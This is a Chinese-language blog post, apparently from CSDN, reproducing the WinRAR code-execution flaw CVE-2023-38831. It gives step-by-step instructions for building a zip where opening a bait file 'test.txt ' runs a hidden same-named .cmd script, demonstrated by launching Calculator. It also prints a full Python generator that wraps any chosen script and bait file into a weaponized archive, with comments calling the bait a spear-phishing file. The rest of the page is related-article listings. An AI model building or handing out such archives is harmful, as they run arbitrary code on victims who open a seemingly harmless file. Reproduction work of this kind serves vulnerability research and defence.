WinRAR代码执行漏洞CVE-2023-38831复现

最新推荐文章于 2023-10-08 18:00:26 发布
最新推荐文章于 2023-10-08 18:00:26 发布
阅读量214 收藏
点赞数
文章标签: winrar
原文链接:https://mp.weixin.qq.com/s?__biz=MzA5MzYzMzkzNg==&mid=2650928162&idx=1&sn=6f530cbf5fd16c18b3c12ef0649b8643&chksm=8bafb8ddbcd831cb276cf3254426bb2f02319e64ab02c6a833f26862f1150b6b808510fb940c&mpshare=1&scene=1&srcid=0829OutMorv9cC6KudbyMYWI&sharer_sharetime
版权

首先利用两个压缩工具,一个是7z,一个是rar,7z主要是用来创建测试漏洞文件

在文件夹中,创建两个文件

1 test (文件夹)

2 ReadMe.txt .cmd (批处理文件)

用7z,压缩文件,右键把test文件夹压缩成zip,然后在打开

新建一个名称为,ReadMe.txt 的文件和 ReadMe.txt 文件夹(注意,文件是会有冲突的)踩坑点,需要用rar和7z配合使用

在test文件夹内再创建一个test.txt文件夹(不在桌面创建是因为已经有了一个test.txt文本),然后在test.txt文件夹中创建"test.txt .cmd",注意有空格哟。

这里可以创建cmd或者bat两种脚本文件。

test.zip压缩包需要用7zip打开,然后把test.txt文件夹拖入压缩包中,修改test.txt文件夹名称加一个空格"test.txt "

把桌面的test.txt也拖入test.zip压缩包中,也需要重命名为"test.txt "

最后用压缩包打开,双击"test.txt "成功执行"test.txt .cmd"打开Calc

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import shutil
import os
import sys

TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "CVE-2023-38831-poc.rar"

BAIT_NAME = "test.txt"
SCRIPT_NAME = "test.bat"

def main():
    global BAIT_NAME, SCRIPT_NAME, OUTPUT_NAME  # 声明为全局变量

    # 处理命令行参数
    if len(sys.argv) > 3:
        BAIT_NAME = os.path.basename(sys.argv[1])
        SCRIPT_NAME = os.path.basename(sys.argv[2])
        OUTPUT_NAME = os.path.basename(sys.argv[3])
    elif len(sys.argv) == 2 and sys.argv[1] == "poc":
        pass
    else:
        print("""用法:
              python cve-2023-38831-exp-gen.py poc
              python cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
        sys.exit()

    # 提取鱼叉文件名的扩展名
    BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")

    print("鱼叉文件名:", BAIT_NAME)
    print("脚本文件名:", SCRIPT_NAME)
    print("输出文件名:", OUTPUT_NAME)

    # 清理并创建必要的目录
    if os.path.exists(TEMPLATE_NAME):
        shutil.rmtree(TEMPLATE_NAME)
    os.mkdir(TEMPLATE_NAME)
    d = os.path.join(TEMPLATE_NAME, BAIT_NAME + "A")
    if not os.path.exists(d):
        os.mkdir(d)

    # 复制文件到模板目录
    shutil.copyfile(SCRIPT_NAME, os.path.join(d, BAIT_NAME + "A.cmd"))
    shutil.copyfile(BAIT_NAME, os.path.join(TEMPLATE_NAME, BAIT_NAME + "B"))

    # 创建模板目录的 zip 压缩文件
    shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)

    # 读取、修改并写回 zip 压缩文件
    with open(TEMPLATE_NAME + ".zip", "rb") as f:
        content = f.read()
        content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
        content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")

    os.remove(TEMPLATE_NAME + ".zip")

    # 将修改后的内容保存为最终输出文件
    with open(OUTPUT_NAME, "wb") as f:
        f.write(content)

    print("成功生成漏洞利用代码。")

if __name__ == "__main__":
    main()

键盘遇上小怪兽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码RARLabs WinRAR 6.23之前版本存在安全漏洞...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
winrar代码执行漏洞CVE-2023-38831复现
为之的博客
08-29 246
参考:https://www.youtube.com/watch?保存后,点击下面的png图片即可执行代码
漏洞复现RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
做自己喜欢的事,并将其发挥到极致!
09-11 654
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RARWindows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2242
最近WinRARCVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
WinRAR CVE-2023-38831简单复现
潇湘信安的博客
09-18 291
CVE-2023-38831漏洞2023 年 4 月至 2023 年 8 月期间在野外被利用。当用户尝试查看 ZIP 存档中的良性文件时,WinRAR 6.23之前的版本允许攻击者执行任意代码。出现此问题的原因是 ZIP 存档可能包含良性文件(例如普通 .JPG 文件)以及与良性文件同名的文件夹,并且处理该文件夹的内容(可能包括可执行内容)在尝试仅访问良性文件期间。
CVE-2023-38831漏洞复现过程(Winrar漏洞
weixin_47948655的博客
10-08 278
CVE-2023-38831漏洞复现过程(Winrar漏洞
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
WinRAR代码执行漏洞(CVE-2023-38831)
qq_42751192的博客
08-29 404
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码
CVE-2018-2025(winrar远程代码执行漏洞
simple___sunny的博客
03-13 2347
漏洞背景: 2019 年 2 月 20 日 Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞WinRAR 代码执行相关的 CVE 编号如下: CVE-2018-20250, CVE-2018-20251, CVE-2018-2025...
WinRAR曝遗留19年重大漏洞,可完全控制电脑(附解决方法)
AI科技大本营
02-22 2663
整理 | 琥珀出品 | AI科技大本营(ID:rgznai100)作为目前最受欢迎的电脑解压缩工具之一,WinRAR 号称在全球拥有 5 亿用户。不过最近的情况表明,如果...
winRAR目录穿越漏洞复现全过程
向晨的博客
03-01 1173
winRAR目录穿越漏洞 1. winRAR概述 WinRAR 是一款功能强大的压缩包管理器,它是档案工具RARWindows环境下的图形界面。该软件可用于备份数据,缩减文件的的大小,解压缩从网络上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。 2WinRAR漏洞 今天给大家带来的是WinRAR中发现的漏洞,并且此漏洞已经使用了19年之久。该漏洞当处...
winrar压缩命令实例
ying1979的专栏
08-10 502
winrar压缩命令实例
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
05-20
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
JavaScript_超过100种语言的纯Javascript OCR.zip
05-20
JavaScript
mysql安全漏洞CVE-2023-0215
07-29
- *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值